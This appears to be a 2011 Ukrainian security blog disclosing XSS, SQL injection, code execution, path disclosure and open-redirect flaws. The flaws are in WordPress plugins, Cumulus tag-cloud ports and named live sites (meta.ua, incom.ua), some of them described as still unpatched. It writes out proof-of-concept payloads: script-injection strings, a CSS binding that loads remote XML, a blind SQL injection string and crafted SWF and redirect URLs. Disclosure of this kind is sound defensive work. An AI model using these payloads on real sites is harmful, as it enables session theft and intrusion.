Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Skysa App Bar, 1 jquery photo gallery slideshow flash та Flash album gallery. Для котрих з’явилися експлоіти. Skysa App Bar - це плагін для розширення сайту за рахунок розміщення веб додатків на панелі, 1 jquery photo gallery slideshow flash - це плагін для створення фотогалереї, Flash album gallery - це також плагін для створення фотогалереї.

• Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress 1-jquery-photo-gallery-slideshow-flash plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

01.12.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це друга з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2011

Persistent XSS:

На сторінці http://site/wp-admin/options-general.php ?page=register-plus-redux є наступні уразливості.

В полях: Email Verification, Admin Verification, User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification), Custom Register CSS, Custom Login CSS:
</textarea><script>alert(document.cookie)</script>
Код спрацює на сторінці http://site/wp-admin/options-general.php?page=register-plus-redux, а у випадку полей Email Verification і Admin Verification ще спрацює на сторінці http://site/wp-login.php?checkemail=registered.

Якщо вказати код в полях Custom Register CSS, Custom Login CSS:

body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

То код відповідно спрацює на сторінках http://site/wp-login.php?action=register та http://site/wp-login.php. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Якщо вказати код в полі Minimum password length (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1
То код спрацює на сторінці http://site1/wp-login.php?action=register.

Якщо вказати код в полях Empty, Short, Bad, Good, Strong, Mismatch (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
"};alert(document.cookie);/*
То код спрацює на сторінці http://site/wp-login.php?action=register.

Якщо вказати код в полі Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
То код спрацює на сторінці http://site/wp-login.php?action=register. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Strictly Social XSS persistent:

У вищезгаданих полях User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification) окрім XSS в самому полі, є ще XSS через візуалізацію (що відбувається через jQuery), і відповідно при відправці POST запиту код спрацює двічі, й виправляти кожну з цих уразливостей потрібно в двох місцях (бо навіть заескейпчений html-код виконається). Також, окрім атаки через відправку POST запиту, можна провести XSS атаку через візуалізацію в цих трьох полях, а також в девяти інших полях (From Email, From Name, Subject в Custom New User Message, в Custom Verification Message та в Custom Admin Notification) при вставці XSS коду в поле.

Тобто потрібно обманним чином змусити жертву вставити код в одне з цих дванадцяти полів, при цьому код можна занести жертві в буфер через атаку через буфер обміну. Дані уразливості - це Strictly social XSS.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі). Як і в попередніх версіях плагіну.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

Продовжу тему Wi-Fi точок доступа після D-Link DAP 1150. Сьогодні я дослідив пристрій Belkin Surf N150 Wireless N Router, що являє собою Wi-Fi Access Point та Router. І попередній аналіз цього пристовую показав, що в ньому мають місце Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Такі ж уразливості, що і в D-Link DAP 1150, та в ADSL роутерах D-Link DSL-500T та Iskra Callisto 821+.

Цей пристрій лежав в мене ще з початку грудня, лише сьогодні до нього дістався. Але при дослідженні виявилося, що пристрій глючний (немає доступу до адмінки, ні по даним вказаним в документації, ні по даним доступним в Інтернеті). Тому майже нічого перевірити не вдалося і поки що лише опосередковано (по документації пристрою) можу судити по наявності в нього даних уразливостей. Які є типовими для всіх мережевих пристроїв.

Коли вдаться вирішити проблеми з глюками цього пристрою, я оприлюдню більш детальну інформацію про його уразливості - в цьому записі та нових записах про уразливості в Belkin Surf N150. При цьому зазначу, що Windows-додаток для налаштувань пристрою, який постачається на CD, використовує спеціальний захисний підхід до проведення конфігурації девайся, що убезпечує його від локальних атак.

Подібне я зустрів вперше і на мережевих пристроях інших виробників такого я не зустрічав. Тому пристрій Belkin виглядає більш безпечним порівняно з іншими точками доступа (але я планую ще перевірити чи використовується цей підхід в панелі керування).

В даній добірці уразливості в веб додатках:

• Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default (деталі)
• SQL injection in Social Slider (деталі)
• XWeavers (page.asp?id) Remote SQL injection Vulnerability (деталі)
• Software Center vulnerability (деталі)
• Synchrony Infotech (product_details.php?id) Remote SQL injection Vulnerability (деталі)
• Kimia Remote SQL injection Vulnerability (деталі)
• Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability (деталі)
• Remot File Include In Aardvark Topsites PHP 5 (деталі)
• Remot File Include In Shop-SCRIPT FREE (деталі)
• Remot File Include In SLAED CMS 2 (деталі)

30.11.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це перша з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting, SQL Injection, Code Execution та Full path disclosure уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

29.12.2011

XSS:

POST запит на сторінці http://site/wp-login.php?action=register
</textarea><script>alert(document.cookie)</script>В полі: About Yourself.

Використовуючи функцію Autocomplete URL можна провести атаку через GET:

http://site/wp-login.php?action=register&description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Всі атаки на persistent XSS та persistent SQL Injection уразливості на сторінці конфігурації плагіна можуть проводитися через reflected XSS уразливості з метою обходу захисту від CSRF-атак.

Persistent XSS:

При включенні в налаштуваннях плагіна опції Show Invitation Code Tracking widget on Dashboard та додання коду запрошення (Add a new invitation code), можна вказати JS/VBS код.
<script>alert(document.cookie)</script>
Який спрацює на сторінці Dashboard (http://site/wp-admin/index.php). Це дефолтна сторінка, на яку заходять адмін та користувачі сайта при аутентифікації.

Persistent SQL Injection:

При включенні в налаштуваннях плагіна опції Show Invitation Code Tracking widget on Dashboard та додання коду запрошення (Add a new invitation code), можна вказати код для SQL ін’єкції.
' and benchmark(1000000,md5(now())) and 1='1Який спрацює при відвідуванні сторінки Dashboard (http://site/wp-admin/index.php). Це Persistent Blind SQL Injection.

Code Execution:

Маючи доступ до налаштувань плагіна, можна провести Code Execution через аплоаідінг 1.phtml.jpg. Це залежить від версії движка, про що я писав в записі Виконання коду в WordPress 2.5 - 3.1.1. Дана атака спрацює в версіях движка до WordPress 3.1.3, де розробники виправили функціонал аплоадінга (що використовується плагіном).

Full path disclosure:

http://site/wp-content/plugins/register-plus-redux/register-plus-redux.php

В register-plus-redux.php є FPD як і в попередніх версіях. А файл dash_widget.php (з FPD) перероблений на dashboard_invitation_tracking_widget.php, в якому вже немає FPD.

Так само як і виправлена FPD при POST запиті на сторінці http://site/wp-login.php?action=register. Але спеціальним чином її можна відновити.

При доданні нового поля в Additional Fields і при вказанні 1 (або майже будь-якого значення) в полі Options та включенні опції Show on Registration, з’явиться FPD при POST запиті на сторінці http://site/wp-login.php?action=register.

Також можна додати на сайт ще дві FPD уразливості. Якщо вказати Custom Logo URL адресу не до файла зображення або просто “http://”, то буде виводиться повідомлення про помилку з FPD на сторінках http://site/wp-admin/options-general.php ?page=register-plus-redux і http://site/wp-login.php?action=register.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

Ще 30.06.2007 я знайшов Redirector уразливості (а 31.07.2009 додатково виявив Cross-Site Scripting уразливості) на сайті http://meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на img.meta.ua.

XSS (Strictly social XSS):

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

XSS:

• alert(document.cookie)

Redirector (URL Redirector Abuse):

http://meta.ua/jmp.asp?http://websecurity.com.ua

http://meta.ua/nav.asp?http://websecurity.com.ua

http://meta.ua/adclick.asp?href=http://websecurity.com.ua

http://meta.ua/c.asp?href=http://websecurity.com.ua

Про ці редиректори я вже писав в 2007 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у червні 2007 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

В даній добірці уразливості в веб додатках:

• Hewlett-Packard Data Protector DtbClsLogin Utf8cpy Remote Code Execution Vulnerability (деталі)
• phpMyAdmin 3.x Conditional Session Manipulation (деталі)
• phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability (деталі)
• HP Data Protector Express and HP Data Protector Express Single Server Edition (SSE), Local Denial of Service (DoS), Execution of Arbitrary Code (деталі)
• Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities (деталі)
• Multiple XSS in HESK (деталі)
• HP Data Protector Express and HP Data Protector Express Single Server Edition (SSE), Local Denial of Service (DoS), Execution of Arbitrary Code (деталі)
• Eve-NukePortal file include (phpbb_root_path) (деталі)
• MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability (деталі)
• codebb 1.1b3 (phpbb_root_path) Remote File Include Vulnerability (деталі)

Раніше я вже писав про уразливість в плагінах для Serendipity, Social Web CMS, PHP-Fusion, Magento та Sweetcron та багатьох інших портах WP-Cumulus для різних движків. Така ж уразливість є і в версіях даного плагіна для MODx CMS, XOOPS, uCoz, Magento та DSP CMS, що використовують tagcloud.swf розроблений автором WP-Cumulus.

Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах. Автори цих плагінів, як і тих плагінів, про які я писав раніше, так і не спромоглися виправити дану XSS уразливість з листопада 2009 року, коли я оприлюднив уразливості в WP-Cumulus для WordPress, повідомив про них авторові й він маже повністю їх виправив. Тому доводиться нагадувати кожному з цих розробників окремо.

Восени, 02.09.2011, 09.11.2011 та 18.11.2011, я знайшов Cross-Site Scripting уразливості в Tagcloud для MODx CMS, Сumulus для XOOPS, uCoz-Cumulus для uCoz, Cumulus Tagcloud для Magento та Cumulus для DSP CMS. Деякі з цих плагінів уразливі до однієї, а деяки до двох XSS - як до першої дірки в WP-Cumulus, що я оприлюднив в 2009 році, так і до другої дірки, що я оприлюднив в 2011 році.

XSS:

Tagcloud для MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Сumulus для XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus для uCoz:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Про дірку в якому, на прикладі сайта www.umvspz.gov.ua, я вже згадував торік в себе в новинах та оприлюднив на vs-db.info.

Cumulus Tagcloud для Magento:

http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml
http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Через параметри mode та xmlpath.

Сumulus для DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії Tagcloud для MODx CMS, Сumulus для XOOPS 1.0, який також входить в ExtendedPackRU для XOOPS. Уразливі всі версії uCoz-Cumulus для uCoz, всі версії Cumulus Tagcloud для Magento та всі версії Сumulus для DSP CMS.

В даній добірці уразливості в веб додатках:

• HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code (деталі)
• Precision (products.php?cat_id) Remote SQL injection Vulnerability (деталі)
• Lava (news_item.php?id) (album.php?id) (basket.php?baction) Remote SQL injection Vulnerability (деталі)
• HP Directories Support for ProLiant Management Processors for Integrated Lights-Out iLO2 and iLO3, Unauthorized Access (деталі)
• SQL injection vulnerabilities in Support Incident Tracker (деталі)
• Cross-Site Scripting in Koha Library Software (деталі)
• Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2 (деталі)
• Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities (деталі)
• JC URLshrink 1.3.1 Remote Code Execution Vulnerability (деталі)
• phpBB Module Forum picture and META tags 1.7 File Include Vulnerability (деталі)

У грудні, 10.12.2011, я знайшов Cross-Site Scripting та Brute Force уразливості на http://it-consulting.incom.ua - сайті секюріті компанії Інком. Тоді я звернув увагу, що у Інкома окрім головного сайта на Джумлі-дирумлі є ще багато інших сайтів (на піддоменах) на різних версіях Джумли (1.0.x та 1.5.x), які мають ті самі дірки. Тому виправляти дані уразливості їм потрібно на всіх своїх сайтах.

Після мого повідомлення адміністраціі сайта стосовно дірок на основному сайті, вони також повинні були зрозуміти, що вони відносяться до всіх їхніх сайтів на Joomla (XSS до версій 1.0.х, а BF до всіх версій).

XSS (для Mozilla та Firefox):

• alert(document.cookie)
• цікавий

Brute Force:

http://it-consulting.incom.ua/administrator/

Дані уразливості досі не виправлені.